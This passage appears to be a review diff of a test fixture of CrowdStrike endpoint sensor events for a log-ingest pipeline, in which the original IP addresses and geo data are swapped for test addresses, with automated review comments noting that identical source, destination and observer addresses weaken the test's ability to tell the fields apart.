"{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.102Z", "kind": "event", "action": "EndOfProcess", 
@@ -190,14 +172,44 @@
 "type": "macos"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 546,
- "address": "ff88:1:1:ffff:1014:ce99:9b06:ab12",
- "ip": "ff88:1:1:ffff:1014:ce99:9b06:ab12"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "source": {
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 547,
- "address": "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0",
- "ip": "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "url": {
 "scheme": "http"
@@ -206,30 +218,18 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:2uBRQNCSMl+LoHx8oqqmCIMR3vs=",
+ "community_id": "1:ZmJm1KFUrdmL4/rYSRwMQ18GXnk=",
 "transport": "udp",
 "iana_number": "17",
 "direction": "unknown"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-IA",
- "city_name": "Roland",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Iowa",
- "location": {
- "lon": -93.5063,
- "lat": 42.1646
- }
- },
- "address": "208.126.205.223",
- "vendor": "crowdstrike",
- "ip": "208.126.205.223",
 "serial_number": "ffffffffc59c473aa7fcbbe7438082cb",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:04:48.594Z",
 "ecs": {
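Review bot: `source` and `destination` now carry the identical IPv6 address `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` (the new `original` in the -237 hunk sets both `LocalAddressIP6` and `RemoteAddressIP6` to it), which leaves the fixture unable to detect a swap or copy mistake between `source.*` and `destination.*` in the pipeline, and collapses `related.ip` and `related.hosts` to two entries so a duplicate-handling regression would pass unnoticed as well. The previous fixture used two distinct addresses for exactly this reason. If the supported subset offers a second IPv6 value, using it for one side would keep the test's ability to tell the two fields apart. The `community_id` change is the expected consequence of the new address pair and needs no further attention.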
@@ -237,22 +237,20 @@ }, "related": { "hosts": [ - "208.126.205.223", - "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0", - "ff88:1:1:ffff:1014:ce99:9b06:ab12" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1620585913" ], "ip": [ - "208.126.205.223", - "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0", - "ff88:1:1:ffff:1014:ce99:9b06:ab12" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465444600Z", - "original": "{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0\",\"RemoteAddressIP6\":\"ff88:1:1:ffff:1014:ce99:9b06:ab12\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"208.126.205.223\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150589500Z", + "original": 
"{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:48.615Z", "kind": "event", "action": "RawBindIP6", @@ -311,21 +309,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.130.207.129", - "vendor": "crowdstrike", - "ip": "208.130.207.129", "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.527Z", "ecs": { 
@@ -333,19 +322,19 @@ }, "related": { "hosts": [ - "208.130.207.129" + "67.43.156.14" ], "hash": [ "f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018", "1620585913" ], "ip": [ - "208.130.207.129" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465451300Z", - "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"208.130.207.129\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n )\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150595900Z", + "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n 
)\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.527Z", "kind": "state", "action": "ProcessRollup2Stats", @@ -373,24 +362,12 @@ }, { "observer": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-EAL", - "city_name": "Greenford", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Ealing", - "location": { - "lon": -0.3333, - "lat": 51.5167 - } - }, - "address": "208.49.81.196", - "vendor": "crowdstrike", - "ip": "208.49.81.196", "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:14.783Z", "os": { 
@@ -401,18 +378,18 @@ }, "related": { "hosts": [ - "208.49.81.196" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.49.81.196" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465458Z", - "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"208.49.81.196\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150602200Z", + "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.783Z", "kind": "event", "action": "SensorHeartbeat", 
@@ -478,21 +455,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.24.129.49",
- "vendor": "crowdstrike",
- "ip": "208.24.129.49",
 "serial_number": "ffffffff8be84591864008eb2e484920",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:02.500Z",
 "ecs": {
@@ -500,7 +468,7 @@
 },
 "related": {
 "hosts": [
- "208.24.129.49"
+ "67.43.156.14"
 ],
 "hash": [
 "88922d50263b059696c2af5a99906562",
@@ -508,12 +476,12 @@ "1620585913" ], "ip": [ - "208.24.129.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465464900Z", - "original": "{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"208.24.129.49\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150608400Z", + "original": 
"{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.500Z", "kind": "event", "action": "ProcessRollup2", @@ -556,24 +524,9 @@ "type": "linux" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.230.0.2", "port": 53, - "ip": "208.230.0.2" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 39920, 
@@ -587,27 +540,18 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:YkZ7Gqgmc/E4zJF1lpoyNc7PxC4=",
+ "community_id": "1:urvmigA14TUbvxTimPg744QEiSA=",
 "transport": "udp",
 "iana_number": "17",
 "direction": "inbound"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.238.3.157",
- "vendor": "crowdstrike",
- "ip": "208.238.3.157",
 "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.8.0011308.1"
+ "version": "1007.8.0011308.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:04.982Z",
 "ecs": {
@@ -615,22 +559,20 @@ }, "related": { "hosts": [ - "208.238.3.157", - "0.0.0.0", - "208.230.0.2" + "67.43.156.14", + "0.0.0.0" ], "hash": [ "1701000200" ], "ip": [ - "208.238.3.157", - "0.0.0.0", - "208.230.0.2" + "67.43.156.14", + "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465471600Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"208.238.3.157\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"208.230.0.2\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150614800Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:05.511Z", "kind": "event", "action": "NetworkReceiveAcceptIP4", 
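Review bot: Because observer, source and destination now all carry 67.43.156.14, `related.hosts` and `related.ip` shrink from three entries to two in this hunk (the former destination `208.230.0.2` simply vanishes after deduplication), so a regression that stops appending one of those roles to `related.*` would no longer change this fixture; the same collapse happens at `@@ -721` and `@@ -1207`. The `@@ -1179` hunk already gives the observer `67.43.156.13` while source and destination share `67.43.156.14`, so the pattern is already half-way there: assigning each role its own distinct address from the supported subset would keep `related.*` able to tell the roles apart. This is a fixture-quality point rather than a defect in the pipeline itself.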
@@ -668,24 +610,9 @@
 "ip": "0.0.0.0"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 1239,
- "organization": {
- "name": "Sprint"
- }
- },
- "address": "208.30.0.2",
 "port": 53,
- "ip": "208.30.0.2"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "url": {
 "scheme": "http"
@@ -699,21 +626,12 @@
 "direction": "unknown"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.215.150.206",
- "vendor": "crowdstrike",
- "ip": "208.215.150.206",
 "serial_number": "ffffffff01fc49949cf06bf0bce3c010",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:21.866Z",
 "ecs": {
@@ -721,22 +639,20 @@ }, "related": { "hosts": [ - "208.215.150.206", - "208.30.0.2", + "67.43.156.14", "0.0.0.0" ], "hash": [ "3090255842" ], "ip": [ - "208.215.150.206", - "208.30.0.2", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465478400Z", - "original": "{\"LocalAddressIP4\":\"208.30.0.2\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"208.215.150.206\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150621Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:22.009Z", "kind": "event", "action": "RawBindIP4", 
@@ -789,24 +705,12 @@
 "direction": "outbound"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-OR",
- "city_name": "Gresham",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Oregon",
- "location": {
- "lon": -122.4167,
- "lat": 45.5152
- }
- },
- "address": "208.187.110.246",
- "vendor": "crowdstrike",
- "ip": "208.187.110.246",
 "serial_number": "ffffffff083845f68a7de3d95cb34361",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:23.901Z",
 "ecs": {
@@ -814,7 +718,7 @@
 },
 "related": {
 "hosts": [
- "208.187.110.246",
+ "67.43.156.14",
 "0:0:0:0:0:0:0:0",
 "127.0.0.1"
 ],
@@ -822,14 +726,14 @@ "3090255842" ], "ip": [ - "208.187.110.246", + "67.43.156.14", "0:0:0:0:0:0:0:0", "127.0.0.1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465485100Z", - "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"208.187.110.246\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150627200Z", + "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.048Z", "kind": "event", "action": "NetworkConnectIP6", 
@@ -890,21 +794,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.194.125.248",
- "vendor": "crowdstrike",
- "ip": "208.194.125.248",
 "serial_number": "ffffffffcf45409f87ed463b40c368ec",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.8.0010912.1"
+ "version": "1007.8.0010912.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:35.482Z",
 "ecs": {
@@ -912,7 +807,7 @@
 },
 "related": {
 "hosts": [
- "208.194.125.248"
+ "67.43.156.14"
 ],
 "hash": [
 "29037cef466fa57f03bd1b2a092c47a4",
@@ -920,12 +815,12 @@ "1284133626" ], "ip": [ - "208.194.125.248" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465491900Z", - "original": "{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"208.194.125.248\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F 